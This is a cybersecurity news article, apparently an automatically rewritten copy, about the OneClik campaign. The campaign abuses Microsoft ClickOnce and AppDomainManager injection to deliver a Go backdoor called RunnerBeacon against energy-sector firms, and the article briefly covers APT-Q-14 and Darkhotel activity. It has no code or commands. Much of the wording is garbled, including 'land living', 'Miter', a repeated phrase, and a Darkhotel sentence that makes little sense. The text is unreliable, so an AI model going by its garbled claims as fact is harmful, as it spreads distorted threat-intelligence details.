Cybersecurity researchers detail a new campaign that calls Oneclik, leveraging Microsoft’s ClickOnce software deployment technology and a bespoke Golang backdoor, calling it a new campaign that compromises organizations within the energy, oil and gas sectors.
“The campaign shows the characteristics alongside threat actors belonging to China, but attribution is cautious,” Trellix researchers Nico Paulo Yturriaga and Pham Duy Phuc said in a technical article.
“The method reflects a broader shift towards ‘land living’ tactics, merging malicious operations within the cloud with malicious operations within enterprise tools to circumvent traditional detection mechanisms. ”
Phishing attacks use a .NET-based loader called onecliknet to deploy a sophisticated Go-based backdoor codenamed Runnerbeacon, designed to communicate with obscure attacker-controlled infrastructure using Amazon Web Services (AWS) cloud services.
ClickOnce is provided by Microsoft as a way to install and update Windows-based applications with minimal user interaction. It was introduced in .NET Framework 2.0. However, this technology is an attractive tool for threat actors who are trying to execute malicious payloads without raising a red flag.
As described in the Miter ATT & CK framework, you can use the ClickOnce application to run malicious code via the trusted Windows binary “DFSVC.EXE”, which is responsible for installing, launching and updating apps. The app will be launched as a child process of “dfsvc.exe”.
“The ClickOnce application only receives limited permissions, so it does not require administrative permissions to install,” explains Miter. “In this way, the enemy could abuse clicks to proxy execution of malicious code without the need to escalate privileges.”
According to Trellix, the attack chain starts with a phishing email containing a link to a fake hardware analysis website that acts as a conduit for delivering ClickOnce applications, and then runs the executable using DFSVC.Exe.
The binary is a ClickOnce loader that launches by injecting malicious code via another technique called AppDomainManager injection, and eventually encrypted shellcode is executed in memory and the RunnerBeacon backdoor is loaded.
Golang Implant can communicate with command and control (C2) servers via pipes named HTTP, WebSocket, RAW TCP, and SMB, perform file operations, enumerate and terminate execution processes, execute shell commands, escalate privileges using token theft and withstand, and achieve subsequent movements.
Additionally, the backdoor has built-in anti-analysis capabilities to avoid detection, supporting network operations such as port scan, port forwarding, and Socks5 protocols to facilitate proxy and routing capabilities.
“The Runnerbeacon design is closely comparable to known Go-based cobalt strike beacons (such as the Geacon/Geacon Plus/Geacon Pro family),” the researchers said.
“Like Geacon, the use of sets of commands (shells, process enumerations, file I/O, proxy etc.) and cross-protocol C2 is very similar. These structural and functional similarities are fork or secretly qualified Geacons that Runnerbeacon evolved to, and to suit cloud-like operations, and to, cloud-like operations.
In March 2025 alone, three different variants, V1A, BPI-MDM, and V1D, have been observed, indicating that each iteration has gradually improved its ability to fly under the radar. That said, a variant of Runnerbeacon was identified in September 2023 by a Middle Eastern company in the oil and gas sector.
Techniques like AppDomainManager Injection have been used in the past by threat actors related to China and North Korea, but this activity is not formally attributable to known threat actors or groups.
The development detailed the campaign installed by Qianxin by threat actors tracking as APT-Q-14, so it adopted the ClickOnce app to propagate malware by leveraging zero-day cross-site scripting (XSS) flaws on the web version of the unknown email platform. The vulnerability has since been patched.
The XSS flaw is automatically triggered when the victim opens a phishing email and the Clickone app is downloaded. “The body of the phishing email comes from Yahoo News, which coincides with the victims industry,” Qianxin said.
The intrusion sequence provides the mailbox instruction manual as a decoy, but a malicious Trojan is secretly installed on a Windows host, collecting and removing system information on a C2 server, and receiving an unknown next-stage payload.
The Chinese cybersecurity company said the APT-Q-14 also focuses on zero-day vulnerabilities in email software for the Android platform.
The APT-Q-14 is described as originating from Northeast Asia by QIANXIN and overlaps with other clusters called APT-Q-12 (aka Pseudo Hunter) and APT-Q-15.
Earlier this week, the Beijing-based 360 Threat Intelligence Centre ended Microsoft Defender Antivirus in February 2025 as part of a phishing attack that provided fake MSI installation packages, revealing that Darkhotel used Bring Your Own’s own Vulnerable Driver (BYOVD) technology to deploy malware.
Malware is designed to establish communication with remote servers and downloads, decrypts and executes unspecified shellcode.
“In general, [hacking group’s] Tactics have tended to be “simple” in recent years. Unlike previous use of weight vulnerabilities, it employs flexible, new delivery methods and attack techniques,” the company said.
Source link
